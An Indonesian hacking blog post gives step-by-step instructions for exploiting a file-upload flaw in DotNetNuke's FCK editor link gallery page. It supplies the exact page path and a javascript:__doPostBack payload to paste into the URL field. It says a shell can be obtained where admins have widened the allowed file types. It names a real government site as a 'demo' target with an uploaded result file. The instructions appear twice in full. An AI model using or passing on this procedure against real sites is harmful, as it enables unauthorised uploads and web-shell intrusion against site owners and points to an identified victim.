| Filename | DNN (DotNetNuke) file Upload Vulnerability |
| Permission | rw-r--r-- |
| Author | Mysterykid |
| Date and Time | 05.30 |
| Label | Hacking |
| Action |
Setelah anda Menemukan jalan DNN kemudian pergi ke file ini
expl : 127.1.0.0/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
Pilih: File (A File Pada Situs Anda)
setelah Loading maka Pasang Kode Etik ini bukan URL
javascript:__doPostBack('ctlURL$cmdUpload','')
sekarang Anda melihat Browsea
root folder pilih dan file Anda akan meng-upload ke
situs/dnn path/Portals/0
Catatan: Anda hanya dapat meng-upload *. swf, *. jpg, *. jpeg, *. JPE, *. gif, *. bmp, *. png, *. doc, *. xls, *. ppt, *. pdf, *. txt, *. xml, *. xsl, *. css, *. zip, *. 3gp, *. asf, *. asx, *. avi, *. flv, *. m4v, *. mov, *. mp4, *. mpe, *. mpeg, *. mpg, *. ram, *. rm, *. rmvb, *. wm, *. wmv, *. vob
oleh defualt tetapi admin dapat mengubah ini dan Anda akan memiliki Shell
demo : http://www.dav.gov.vn/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
hasil : http://www.dav.gov.vn/Portals/0/CMD666.txt
expl : 127.1.0.0/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
Pilih: File (A File Pada Situs Anda)
setelah Loading maka Pasang Kode Etik ini bukan URL
javascript:__doPostBack('ctlURL$cmdUpload','')
sekarang Anda melihat Browsea
root folder pilih dan file Anda akan meng-upload ke
situs/dnn path/Portals/0
Catatan: Anda hanya dapat meng-upload *. swf, *. jpg, *. jpeg, *. JPE, *. gif, *. bmp, *. png, *. doc, *. xls, *. ppt, *. pdf, *. txt, *. xml, *. xsl, *. css, *. zip, *. 3gp, *. asf, *. asx, *. avi, *. flv, *. m4v, *. mov, *. mp4, *. mpe, *. mpeg, *. mpg, *. ram, *. rm, *. rmvb, *. wm, *. wmv, *. vob
oleh defualt tetapi admin dapat mengubah ini dan Anda akan memiliki Shell
demo : http://www.dav.gov.vn/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
hasil : http://www.dav.gov.vn/Portals/0/CMD666.txt
0 komentar:
Posting Komentar